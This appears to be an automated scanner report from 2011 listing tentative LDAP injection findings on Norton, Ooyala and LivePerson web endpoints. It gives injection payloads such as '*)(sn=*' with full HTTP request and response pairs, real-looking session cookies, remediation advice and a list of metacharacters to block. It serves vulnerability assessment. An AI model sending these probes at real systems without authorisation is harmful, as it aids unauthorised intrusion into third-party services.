LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action. Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Issue remediation
If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.
1.1. https://onlinefamily.norton.com/familysafety/basicpremium.fs [REST URL parameter 2]
Summary
Severity: High
Confidence: Tentative
Host: https://onlinefamily.norton.com
Path: /familysafety/basicpremium.fs
Issue detail
The REST URL parameter 2 appears to be vulnerable to LDAP injection attacks. The payloads 2e38829777b43edb)(sn=* and 2e38829777b43edb)!(sn=* were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /familysafety/2e38829777b43edb)(sn=* HTTP/1.1 Host: onlinefamily.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Date: Fri, 09 Sep 2011 21:45:51 GMT Server: Apache Set-Cookie: user_pref_lang=eng; Expires=Thu, 08-Dec-2011 21:45:51 GMT; Path=/ Set-Cookie: JSESSIONID=C2C885DF4F91960B21A89E36D3D5E6F7; Path=/familysafety Content-Length: 1420 Content-Type: text/html;charset=UTF-8 Connection: close Vary: Accept-Encoding <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <title>Norton Online Family</title> <link rel="shortcut icon" type="image/x-icon" href="https://onlinefamily.norton.com/familysafety/v-2.2.0-30/images/favicon.ico" /> <link rel="stylesheet" type="text/css" href="https://onlinefamily.norton.com/familysafety/v-2.2.0-30/css/norton-family-safety.css" /> <style type="text/css"> h2 { font-size:32px; } p { font-size:15px; } h2,p { margin:1.2em 0; } #wrap { width:1000px; min-height:480px; *height:480px; margin:0 auto; background: url(https://onlinefamily.norton.com/familysafety/v-2.2.0-30/images/buddy_crossingGuard.gif) no-repeat 0 100px; } </style> <script type="text/javascript"> if(window.parent.location != document.location) { window.parent.location = document.location; } </script> </head> <body> <div id="wrap"> <div style="padding:150px 0 0 360px;"> <h2>Sorry, this page is not found.</h2> <p>The page you are looking for might have been removed or is temporarily unavailable.</p> <p><a href="javascript:history.go(-1);">Click here to go back to the previous page</a></p> </div> </div> </body> </html>
Request 2
GET /familysafety/2e38829777b43edb)!(sn=* HTTP/1.1 Host: onlinefamily.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Date: Fri, 09 Sep 2011 21:45:52 GMT Server: Apache Set-Cookie: user_pref_lang=eng; Expires=Thu, 08-Dec-2011 21:45:52 GMT; Path=/ Content-Length: 1420 Content-Type: text/html;charset=UTF-8 Connection: close Vary: Accept-Encoding <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <title>Norton Online Family</title> <link rel="shortcut icon" type="image/x-icon" href="https://onlinefamily.norton.com/familysafety/v-2.2.0-30/images/favicon.ico" /> <link rel="stylesheet" type="text/css" href="https://onlinefamily.norton.com/familysafety/v-2.2.0-30/css/norton-family-safety.css" /> <style type="text/css"> h2 { font-size:32px; } p { font-size:15px; } h2,p { margin:1.2em 0; } #wrap { width:1000px; min-height:480px; *height:480px; margin:0 auto; background: url(https://onlinefamily.norton.com/familysafety/v-2.2.0-30/images/buddy_crossingGuard.gif) no-repeat 0 100px; } </style> <script type="text/javascript"> if(window.parent.location != document.location) { window.parent.location = document.location; } </script> </head> <body> <div id="wrap"> <div style="padding:150px 0 0 360px;"> <h2>Sorry, this page is not found.</h2> <p>The page you are looking for might have been removed or is temporarily unavailable.</p> <p><a href="javascript:history.go(-1);">Click here to go back to the previous page</a></p> </div> </div> </body> </html>
1.2. http://player.ooyala.com/player.js [height parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://player.ooyala.com
Path: /player.js
Issue detail
The height parameter appears to be vulnerable to LDAP injection attacks. The payloads *)(sn=* and *)!(sn=* were each submitted in the height parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.
Request 1
GET /player.js?width=356&height=*)(sn=* &embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&wmode=transparent HTTP/1.1 Host: player.ooyala.com Proxy-Connection: keep-alive Referer: http://www.verisign.ch/trust-seal/index.html?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819
Response 1
HTTP/1.1 200 OK Last-Modified: Fri, 09 Sep 2011 21:26:25 GMT Content-Type: text/javascript; charset=utf-8 X-Ooyala-Server-Id: i-2b01f44a X-Pad: avoid browser bug Content-Length: 25976 Cache-Control: private, max-age=300 Date: Fri, 09 Sep 2011 21:26:26 GMT Connection: close Vary: Accept-Encoding (function(){var f="9.0.115";var K="6.0.65";window.OOYALA_PLAYER_JS={};var j=(navigator.appVersion.indexOf("MSIE")!==-1)?true:false;var R=(navigator.appVersion.toLowerCase().indexOf("win")!==-1)?true:f...[SNIP]... ="iphone";}if(H){L="ipad";}if(C){L="android";}var P="http://player.ooyala.com/mobile_player.js?embedCodes=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&expires=1315641600&height=0&locale=en-US&playerId=ooyalaPlayer434126523_10kbk3a&rootItemEmbedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&signature=bdlRvCl0lGMCXqu1NQ3yMjViV6g03sK3MpF9NIg4Jgw&video_pcode=w1c2U6fqVnqafrMhiALawYi9UUck&width=356&wmode=transparent&device="+L;var e={getCurrentEmbedScript:function(){if(window.ooyalaActiveScript){return window.ooyalaActiveScript;}var i=document.getElementsByTagName("script");return i[i.length-1];},getQueryStringParams:function(U){if(U===null){return{};}var Z=U.split("?",2);var Y={};if(Z.length===2){var aa=Z[1].split("&");var W;for(W=0;W<aa.length;++W){var T=aa[W].indexOf("=");if(T>=1){var V=aa[W].substring(0,T);var X=aa[W].substring(T+1,aa[W].length);Y[V]=X;}}}return Y;},getThruParamQueryString:function(V){var U;if(V===null){return"";}var T=[];var i=/^thruParam_(.*)/;for(U in V){if(V.hasOwnProperty(U)&&i.test(U)){T.push(U+"="+V[U]);}}return T.join("&");},gup:function(U,T){if(U===null){return"";}T=T.replace(/[\[]/,"\\[").replace(/[\]]/,"\\]");var i="[\\?&]"+T+"=([^&#]*)";var W=new RegExp(i);var V=W.exec(U);if(V===null){return"";}else{return V[1];}},createContainerDiv:function(V,U,i,T){var W=document.createElement("div");W.style.width=U+"px";W.style.height=i+"px";W.style.overflow="hidden";W.setAttribute("id",V);if(T){W.setAttribute("class",T);}return W;},replaceElement:function(i,V,U){var 
X=i?document.getElementById(i):null;if(X){X.innerHTML="";X.appendChild(U);}else{if(document.body){if(typeof(V.parentNode.insertBefore)==="function"){V.parentNode.insertBefore(U,V);}else{var W="containerDiv"+new Date().getTime();document.write("<div id='"+W+"'></div>");var T=document.getElementById(W);T.appendChild(U);}}else{document.write("<body></body>");document.body.appendChild(U);}}},loadScript:function(U,W){var i=document.createElement("script");i.type="text/javascript";i.src=U;if(W){i.onload=W;}var V=null;var T=window.document.getElementsByTagName("head");if(T){V=T[0];}else{V=window.document.childNodes[0].childNodes[0]||window.document.childNodes[0];}if(V){V.appendChild(i);}return i;},mergeObjects:func...[SNIP]...
Request 2
GET /player.js?width=356&height=*)!(sn=* &embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&wmode=transparent HTTP/1.1 Host: player.ooyala.com Proxy-Connection: keep-alive Referer: http://www.verisign.ch/trust-seal/index.html?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819
Response 2
HTTP/1.1 200 OK Last-Modified: Fri, 09 Sep 2011 21:26:26 GMT Content-Type: text/javascript; charset=utf-8 X-Ooyala-Server-Id: i-cfd6a4a3 X-Pad: avoid browser bug Content-Length: 26000 Cache-Control: private, max-age=300 Date: Fri, 09 Sep 2011 21:26:27 GMT Connection: close Vary: Accept-Encoding (function(){var f="9.0.115";var K="6.0.65";window.OOYALA_PLAYER_JS={};var j=(navigator.appVersion.indexOf("MSIE")!==-1)?true:false;var R=(navigator.appVersion.toLowerCase().indexOf("win")!==-1)?true:f...[SNIP]... ="iphone";}if(H){L="ipad";}if(C){L="android";}var P="http://player.ooyala.com/mobile_player.js?embedCodes=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&expires=1315641600&height=0&locale=en-US&playerId=ooyalaPlayer723342756_10kbk3b&rootItemEmbedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&signature=qy1TVnNRkIaAk3DIEJXYxG8EmEV0w4W9%2BQyBYG%2BD2tQ&video_pcode=w1c2U6fqVnqafrMhiALawYi9UUck&width=356&wmode=transparent&device="+L;var e={getCurrentEmbedScript:function(){if(window.ooyalaActiveScript){return window.ooyalaActiveScript;}var i=document.getElementsByTagName("script");return i[i.length-1];},getQueryStringParams:function(U){if(U===null){return{};}var Z=U.split("?",2);var Y={};if(Z.length===2){var aa=Z[1].split("&");var W;for(W=0;W<aa.length;++W){var T=aa[W].indexOf("=");if(T>=1){var V=aa[W].substring(0,T);var X=aa[W].substring(T+1,aa[W].length);Y[V]=X;}}}return Y;},getThruParamQueryString:function(V){var U;if(V===null){return"";}var T=[];var i=/^thruParam_(.*)/;for(U in V){if(V.hasOwnProperty(U)&&i.test(U)){T.push(U+"="+V[U]);}}return T.join("&");},gup:function(U,T){if(U===null){return"";}T=T.replace(/[\[]/,"\\[").replace(/[\]]/,"\\]");var i="[\\?&]"+T+"=([^&#]*)";var W=new RegExp(i);var V=W.exec(U);if(V===null){return"";}else{return V[1];}},createContainerDiv:function(V,U,i,T){var W=document.createElement("div");W.style.width=U+"px";W.style.height=i+"px";W.style.overflow="hidden";W.setAttribute("id",V);if(T){W.setAttribute("class",T);}return W;},replaceElement:function(i,V,U){var 
X=i?document.getElementById(i):null;if(X){X.innerHTML="";X.appendChild(U);}else{if(document.body){if(typeof(V.parentNode.insertBefore)==="function"){V.parentNode.insertBefore(U,V);}else{var W="containerDiv"+new Date().getTime();document.write("<div id='"+W+"'></div>");var T=document.getElementById(W);T.appendChild(U);}}else{document.write("<body></body>");document.body.appendChild(U);}}},loadScript:function(U,W){var i=document.createElement("script");i.type="text/javascript";i.src=U;if(W){i.onload=W;}var V=null;var T=window.document.getElementsByTagName("head");if(T){V=T[0];}else{V=window.document.childNodes[0].childNodes[0]||window.document.childNodes[0];}if(V){V.appendChild(i);}return i;},mergeObjects:...[SNIP]...
1.3. http://sales.liveperson.net/hc/2735064/ [PV%21pageLoadTime parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://sales.liveperson.net
Path: /hc/2735064/
Issue detail
The PV%21pageLoadTime parameter appears to be vulnerable to LDAP injection attacks. The payloads *)(sn=* and *)!(sn=* were each submitted in the PV%21pageLoadTime parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.
Request 1
GET /hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=772257181582-563438479788&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508&id=2707016684&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Ahomepage%3Ahomepage&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=*)(sn=* &PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=en&SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=359A5BC1-187B-E37B-9025-A486DEF7EF50&SV%21partner=store%3Asymantec&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=8455684308930202655; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603881647
Response 1
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:35:11 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064 Set-Cookie: LivePersonID=-5110247826455-1315603892:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:35:11 GMT; path=/hc/2735064; domain=.liveperson.net Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:35:11 GMT Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 188 lpConnLib.Process({"ResultSet": {"lpCallId":"772257181582-563438479788","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});
Request 2
GET /hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=772257181582-563438479788&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508&id=2707016684&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Ahomepage%3Ahomepage&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=*)!(sn=* &PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=en&SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=359A5BC1-187B-E37B-9025-A486DEF7EF50&SV%21partner=store%3Asymantec&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=8455684308930202655; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603881647
Response 2
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:35:12 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064 Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:35:12 GMT Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 188 lpConnLib.Process({"ResultSet": {"lpCallId":"772257181582-563438479788","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});
1.4. http://sales.liveperson.net/hc/2735064/ [SV%21language parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://sales.liveperson.net
Path: /hc/2735064/
Issue detail
The SV%21language parameter appears to be vulnerable to LDAP injection attacks. The payloads cee83379ee2249f6)(sn=* and cee83379ee2249f6)!(sn=* were each submitted in the SV%21language parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=729815930360-803452320629&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/upgradeRenewal%3Frdid%3D2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199&id=244961581&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Aupgrades%20%26%20renewals%3Aupgraderenewal&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=1%20sec&PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=cee83379ee2249f6)(sn=* &SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=CFE83898-5BB0-075A-37F1-7545D477147F&SV%21partner=store%3Asymantec&title=Norton%20Upgrades%20and%20Renewals%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://buy.norton.com/estore/mf/upgradeRenewal?rdid=2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=3716944001314187740; LivePersonID=-5110247826455-1315603885:-1:-1:-1:-1; HumanClickSiteContainerID_2735064=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603886325
Response 1
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:36:08 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064 Set-Cookie: LivePersonID=-5110247826455-1315603885:-1:1315604022:-1:-1; expires=Sat, 08-Sep-2012 21:36:08 GMT; path=/hc/2735064; domain=.liveperson.net Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:36:08 GMT Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 188 lpConnLib.Process({"ResultSet": {"lpCallId":"729815930360-803452320629","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});
Request 2
GET /hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=729815930360-803452320629&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/upgradeRenewal%3Frdid%3D2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199&id=244961581&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Aupgrades%20%26%20renewals%3Aupgraderenewal&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=1%20sec&PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=cee83379ee2249f6)!(sn=* &SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=CFE83898-5BB0-075A-37F1-7545D477147F&SV%21partner=store%3Asymantec&title=Norton%20Upgrades%20and%20Renewals%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://buy.norton.com/estore/mf/upgradeRenewal?rdid=2dc9ee7a-735b-48ad-9d3a-5af89444b3ae1315603880199 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=3716944001314187740; LivePersonID=-5110247826455-1315603885:-1:-1:-1:-1; HumanClickSiteContainerID_2735064=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603886325
Response 2
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:36:09 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064 Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:36:09 GMT Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 188 lpConnLib.Process({"ResultSet": {"lpCallId":"729815930360-803452320629","lpCallConfirm":"","lpJS_Execute":[{"code_id": "INPAGE-DELAY-10", "js_code": "lpMTag.lpInPageRequestDelay=10;"}]}});
1.5. http://sales.liveperson.net/hc/2735064/ [defInvite parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://sales.liveperson.net
Path: /hc/2735064/
Issue detail
The defInvite parameter appears to be vulnerable to LDAP injection attacks. The payloads 23e555a7c9acdf94)(sn=* and 23e555a7c9acdf94)!(sn=* were each submitted in the defInvite parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /hc/2735064/?&site=2735064&cmd=mTagInviteTimeout&lpCallId=243824564852-218836609740&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508&id=2707016684&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=23e555a7c9acdf94)(sn=* &activePlugin=none&cobrowse=true&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true&timeout=120&channel=web&t=1 HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=3716944001314187740; LivePersonID=-5110247826455-1315603885:-1:1315604022:-1:-1; HumanClickSiteContainerID_2735064=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315604066248
Response 1
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:37:49 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:37:49 GMT Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064 Set-Cookie: LivePersonID=-5110247826455-1315603892:-1:1315604196:-1:-1; expires=Sat, 08-Sep-2012 21:37:49 GMT; path=/hc/2735064; domain=.liveperson.net Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 427 lpConnLib.Process({"ResultSet": {"lpCallId":"243824564852-218836609740","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SET-REJECT", "js_code": "lpMTag.lpVisitorStatus = 'REJECT_STATUS';"},{"code_id": "INVITE-TIMEOUT", "js_code": "var cParam=lpMTag.lpSetCallParams('mTagInPage');if(lpMTag.mtagAddToQueue){lpMTag.mtagAddToQueue(lpMTag.lpURL,cParam,null,false);}else{lpConnLib.addToQueue(lpMTag.lpURL,cParam,null,false);};"}]}});
Request 2
GET /hc/2735064/?&site=2735064&cmd=mTagInviteTimeout&lpCallId=243824564852-218836609740&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508&id=2707016684&javaSupport=true&visitorStatus=ENGAGE_STATUS&defInvite=23e555a7c9acdf94)!(sn=* &activePlugin=none&cobrowse=true&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true&timeout=120&channel=web&t=1 HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=572380a9-b4aa-41b0-afd3-f2edfaa197211315603876508 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=3716944001314187740; LivePersonID=-5110247826455-1315603885:-1:1315604022:-1:-1; HumanClickSiteContainerID_2735064=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315604066248
Response 2
